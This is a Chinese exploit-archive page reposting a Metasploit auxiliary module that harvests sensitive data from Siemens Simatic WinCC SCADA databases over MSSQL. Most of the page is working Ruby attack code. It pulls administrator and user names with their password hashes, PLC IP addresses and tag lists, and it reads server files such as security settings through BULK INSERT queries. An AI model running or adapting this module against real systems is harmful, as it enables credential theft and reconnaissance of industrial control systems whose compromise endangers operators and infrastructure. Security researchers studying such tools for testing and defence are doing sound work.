首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simatic WinCC Information Harvester
来源:metasploit.com 作者:Nagibin 发布时间:2013-01-23  
## encoding: UTF-8
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,
			'Name'	=> 'Simatic WinCC info harvester',
			'Description'	=> %q{
				This module receives sensitive information from the WinCC database.
			},
			'Author'	=> 
				[
					'Dmitry Nagibin', # research
					'Gleb Gritsai <ggritsai@ptsecurity.ru>', # research
					'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module
				],
			'License'	=>  MSF_LICENSE,
			'References'	=>
				[
					[ 'URL', 'http://www.ptsecurity.com' ]
				],
			'Version'	=> '$Revision
, 'DisclosureDate'=> 'Jun 3 2012' )) register_options( [ OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']), ], self.class ) end def run if mssql_login_datastore # connect project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'") # get db get_info project_databases_names else print_error "Can't connect to the database" end end def q query, show_errors = true, verbose = false, only_rows = true result = mssql_query(query, verbose) if !result[:errors].empty? and show_errors print_error "Error: #{result[:errors]}" print_error "Error query: #{query}" else only_rows ? result[:rows] : result end end def get_info dbs prj ={} dbs.map do |db| db = db.first # get db name prj[db] = {} # init hash prj[db]["name"] = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog") prj[db]["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000") prj[db]["users"] = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000") prj[db]["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''") prj[db]["plcs"] = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]") prj[db]["tags"] = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]") prj[db]["plcs"] = prj[db]["plcs"].map do |name, ip| # get plc IP real_ip = ip # set current value real_ip = ip.scan(/\d+\.\d+\.\d+\.\d+/).first if ip =~ /\d+\.\d+\.\d+\.\d+/ # if ip notation found [name, real_ip] end print_good "Project: #{prj[db]["name"].first.first}\n" # print project name #Table data print_table %w|ID NAME| , prj[db]["groups"], "WinCC groups" print_table %w|Name Password(hex)| , prj[db]["admins"], "WinCC administrator" print_table %w|ID NAME Password(hex) GRPID| , prj[db]["users"], "WinCC users" print_table %w|VARNAME VARTYP COMMENTS| , prj[db]["tags"], "WinCC tags" print_table %w|CONNECTIONNAME PARAMETER| , prj[db]["plcs"], "WinCC PLCs" #check file access through batched queries if can_read_file? db settings = read_file get_value("Security settings path"), db if settings # save results to file File.open("/tmp/security_settings.xml", "w+") do |f| f.puts settings end end end print_line end end def print_table columns, rows, header = '' tbl = Rex::Ui::Text::Table.new( 'Indent' => 4, 'Header' => header, 'Columns' => columns ) unless rows.nil? rows.each do |r| tbl << r # add rows end print_line tbl.to_s end end #read file through batched queries def read_file file_name, db q("CREATE TABLE mydata (line varchar(8000));", false) q("BULK INSERT mydata FROM '#{file_name}';", false) result = q("select * from mydata", false) q("DROP TABLE mydata;", false) print_error("Can't read file: #{file_name}") if result.nil? result end #check account read file def can_read_file? db res = read_file get_value("test"), db print_status "Access read files! (#{get_value "test"} read)" unless res.nil? res.size > 0 # return true or false end def get_value i config = { "Security settings path" => %q|C:\Documents and Settings\All Users\Documents\SimaticSecurityControl\setRules.xml|, "test" => %q|C:\Windows\win.ini| } config[i] end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Java Applet AverageRangeStatis
·ZoneMinder Video Server packag
·Java Applet Method Handle Remo
·Movable Type 4.2x, 4.3x Web Up
·NVidia Display Driver Service
·SonicWALL GMS 6 Arbitrary File
·Jenkins CI Script Console Comm
·Novell eDirectory 8 Buffer Ove
·Novell NCP Pre-Auth Remote Roo
·Barracuda Networks SSHd Backdo
·PHP-Charts 1.0 PHP Code Execut
·KMPlayer 3.5.0.77 Denial Of Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved